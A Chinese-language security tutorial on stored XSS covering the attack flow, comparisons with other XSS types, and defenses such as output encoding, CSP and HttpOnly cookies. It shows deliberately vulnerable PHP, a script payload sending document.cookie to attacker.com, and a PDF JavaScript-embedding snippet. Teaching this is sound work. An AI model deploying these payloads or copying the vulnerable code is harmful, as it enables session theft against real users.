存储型XSS漏洞解析

一、存储型XSS漏洞的核心原理

定义与攻击流程 存储型XSS（Stored XSS）是一种将恶意脚本永久存储在服务器端（如数据库、文件系统）的跨站脚本攻击方式。其攻击流程分为四步：
- 注入阶段 ：攻击者通过输入点（如留言板、评论框）提交恶意脚本（如<script>窃取Cookie代码</script>）。
- 存储阶段：服务器未过滤输入，直接将恶意脚本存储至数据库或文件。
- 触发阶段：其他用户访问包含恶意脚本的页面时，脚本自动加载并执行。
- 危害扩散：恶意脚本窃取用户敏感信息（如Cookie、会话令牌）或篡改页面内容。

典型代码漏洞示例

复制代码

// 未过滤用户输入，直接存储到数据库（高危漏洞）
$userInput = $_POST['message'];
$db->query("INSERT INTO messages (content) VALUES ('$userInput')");

若用户输入

复制代码

<script>new Image().src="http://attacker.com/steal?cookie="+document.cookie;</script>

则所有访问该页面的用户Cookie将被窃取。

持久化影响
- 恶意脚本长期存在于服务器，所有访问者均可能受害，传播范围远超反射型XSS。
- 案例：某招聘平台允许上传HTML简历，攻击者嵌入恶意脚本后，所有查看简历的用户会话被劫持。
复合攻击场景
- 蠕虫传播：结合社交功能（如论坛、私信），恶意脚本可诱导用户自动转发，形成链式传播。
- 钓鱼与数据泄露：通过篡改页面内容（如伪造登录框）或窃取用户隐私数据（如支付信息）。
高级利用手法
- 文件上传漏洞：攻击者上传含恶意脚本的PDF、SVG等文件，用户访问文件时触发XSS。
- 富文本编辑器绕过：未严格过滤的编辑器允许插入<iframe>或事件属性（如onerror).

类型	存储型XSS	反射型XSS	DOM型XSS
存储位置	服务器数据库/文件	URL参数	客户端DOM
持久性	永久	一次性	一次性
触发方式	用户访问受感染页面	用户点击恶意链接	客户端动态修改DOM
防御重点	输入过滤 + 输出编码	URL参数过滤	客户端DOM操作控制

典型场景：

输入验证与过滤
- 白名单机制：仅允许特定字符（如字母、数字），过滤<script>、onerror等危险标签/属性。
- 富文本处理：使用HTML Purifier等库过滤非安全标签。
输出编码
- 场景适配：根据输出位置选择编码方式（HTML实体、JavaScript Unicode转义）。
  
  // PHP示例：对输出内容进行HTML实体转义
  $safeOutput = htmlspecialchars($ userInput, ENT_QUOTES, 'UTF-8');
  echo "
  " . $safeOutput . "
  ";
安全策略配置
- CSP（内容安全策略）
  
  ：限制脚本来源，如Content-Security-Policy: script-src 'self'。
- HttpOnly Cookie
  
  ：阻止JavaScript访问敏感Cookie。
框架与工具实践
- 前端框架
  
  ：使用React、Vue等框架自动转义输出，避免直接操作innerHTML。
- 自动化检测
  
  ：通过AWVS、Burp Suite扫描输入点漏洞。

留言板漏洞 某网站留言板未过滤用户输入，攻击者提交以下代码：
复制代码
```
<script>
  var stolenCookie = document.cookie;
  new Image().src = "http://attacker.com/steal?cookie=" + stolenCookie;
</script>
```
所有访问留言板的用户Cookie被窃取，攻击者可冒充用户身份。
PDF文件XSS 通过Python生成含恶意JavaScript的PDF文件并上传，用户访问PDF时触发弹窗或窃取数据
复制代码
```
from PyPDF2 import PdfWriter
writer = PdfWriter()
writer.add_js("app.alert('XSS测试');")  # 嵌入恶意脚本
```

存储型XSS因其持久性和广泛影响，是Web安全领域的"高危杀手"。开发者需从输入过滤 、输出编码 、安全策略三层面构建防御体系，并定期通过渗透测试验证防护有效性。对于已暴露的漏洞，应立即修复并通知受影响用户